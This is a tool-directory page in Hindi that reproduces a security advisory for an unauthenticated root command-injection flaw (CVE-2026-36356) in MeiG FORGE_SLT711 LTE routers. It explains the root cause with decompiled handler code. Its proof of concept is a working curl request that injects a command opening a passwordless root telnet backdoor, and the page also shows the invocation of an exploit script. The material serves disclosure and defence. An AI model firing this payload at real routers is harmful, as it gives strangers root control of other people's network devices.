Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2026-36356 — CVE-2026-36356: MeiG Smart FORGE_SLT711 GoAhead - बिना प्रमाणीकरण वाला OS Command Injection (रूट के रूप में RCE) | Kitploit
उपकरण/GitHubGitHub/totekuh/cve-2026-36356
IoT सुरक्षाभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगकमांड एंड कंट्रोलपेलोड डेवलपमेंट
GitHubtotekuh/cve-2026-36356

CVE-2026-36356

CVE-2026-36356: MeiG Smart FORGE_SLT711 GoAhead - बिना प्रमाणीकरण वाला OS Command Injection (रूट के रूप में RCE)

रिपॉजिटरी देखें
13 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2026-36356: MeiG Smart FORGE_SLT711 GoAhead — बिना प्रमाणीकरण वाला OS कमांड इंजेक्शन (/action/SetRemoteAccessCfg)

  • CVE: CVE-2026-36356
  • CWE: CWE-78, CWE-306
  • खोजकर्ता: Daniil Gordeev
  • प्रकटीकरण तिथि: 2026-05-03

सारांश

MeiG Smart FORGE_SLT711 4G LTE CPE उपकरणों के साथ बंडल किया गया GoAhead वेब सर्वर एक बिना प्रमाणीकरण वाला HTTP एंडपॉइंट, /action/SetRemoteAccessCfg, उजागर करता है, जो बिना सैनिटाइज़ेशन के उपयोगकर्ता-नियंत्रित JSON इनपुट को शेल कमांड में इंटरपोलेट करता है। एक एकल बिना प्रमाणीकरण वाला POST अनुरोध root के रूप में मनमाने कमांड निष्पादित करता है।

दो स्वतंत्र मूल कारण हैं: एक लापता प्रमाणीकरण रूट प्रविष्टि, और हैंडलर में एक असुरक्षित sprintf() → system() निर्माण।

प्रभावित उत्पाद

  • विक्रेता: MeiG Smart Technology Co., Ltd. (शेन्झेन, चीन)
  • उत्पाद: FORGE_SLT711 4G LTE CPE राउटर
  • पुष्टि किया गया फ़र्मवेयर: MDM9607.LE.1.0-00110-STD.PROD-1 (मॉडेम फ़र्मवेयर BC-MGST711H_1.1.1_EQ101)
  • वेब सर्वर: MeiG-कस्टम एक्शन हैंडलर वाला GoAhead 3.x (Embedthis) (/usr/bin/goahead)

असुरक्षित कोड MeiG के कस्टम एक्शन हैंडलर में है, अपस्ट्रीम GoAhead में नहीं। इस उत्पाद लाइन के अन्य फ़र्मवेयर संस्करण भी प्रभावित हो सकते हैं; स्वतंत्र रूप से सत्यापित नहीं किया गया है।

परीक्षण वातावरण

डिवाइसOrtel 4G LTE CPE (OEM: MeiG FORGE_SLT711)
SoCQualcomm MDM9607, ARMv7 Cortex-A7
कर्नेलLinux 3.18.48
फ़र्मवेयरMDM9607.LE.1.0-00110-STD.PROD-1
तिथि

तकनीकी विवरण

लापता प्रमाणीकरण (CWE-306)

GoAhead रूट कॉन्फ़िगरेशन /var/www/route.txt में auth=basic का उपयोग करके प्रमाणित रूट (पंक्तियाँ 64–150) सूचीबद्ध हैं। /action/SetRemoteAccessCfg इस सूची में नहीं है। रूटिंग पंक्ति 156 पर कैच-ऑल तक पहुँचती है:

root@kitploit:~
route uri=/action handler=action

कैच-ऑल के पास auth=basic नहीं है, इसलिए कोई भी HTTP क्लाइंट बिना क्रेडेंशियल के /action/SetRemoteAccessCfg को कॉल कर सकता है।

कमांड इंजेक्शन (CWE-78)

/usr/bin/goahead में ऑफ़सेट 0x0003c6d8 पर स्थित हैंडलर डीकंपाइल होकर इस प्रकार दिखता है:

root@kitploit:~
char password_buf[64];      // 0x40 bytes on stack
char command_buf[256];      // 0x100 bytes on stack

websGetJsonItemValue(json, "password", STRING, password_buf, 0x40);
sprintf(command_buf, "echo root:\"%s\"|chpasswd", password_buf);
system(command_buf);

password फ़ील्ड दोहरे उद्धरणों के अंदर इंटरपोलेट किया जाता है। $(...) प्रतिस्थापन और `...` बैकटिक्स दोहरे उद्धरणों के अंदर विस्तारित होते हैं, इसलिए एक हमलावर शेल कमांड को नियंत्रित कर सकता है। system() uid=0 के रूप में चलता है क्योंकि GoAhead प्रक्रिया root के रूप में चलती है। कोई इनपुट सत्यापन नहीं, कोई एस्केपिंग नहीं, कोई कैरेक्टर व्हाइटलिस्ट नहीं।

अवधारणा का प्रमाण

स्थायी टेलनेट बैकडोर

root@kitploit:~
curl -s -X POST http://192.168.1.1/action/SetRemoteAccessCfg \
  -H "Content-Type: application/json" \
  -d '{"password":"$(telnetd -l /bin/sh -p 2323 &)"}'
# Reachable via: telnet 192.168.1.1 2323 (root shell, no password)

बिना प्रमाणीकरण वाला RCE → MeiG FORGE_SLT711 (Ortel 4G LTE CPE) पर /action/SetRemoteAccessCfg के माध्यम से root शेल

संदर्भ Python एक्सप्लॉइट

poc_rce.py (इस परामर्श के साथ प्रकाशित):

root@kitploit:~
python3 poc_rce.py --ip 192.168.1.1 --cmd 'id > /tmp/out'

शोषण ब्लाइंड है — कमांड आउटपुट HTTP प्रतिक्रिया में नहीं होता।

पेलोड सीमाएँ

  • password बफ़र: 64 बाइट्स
  • अंतिम कमांड बफ़र: 256 बाइट्स
टूल डाउनलोड करें
2026-02-21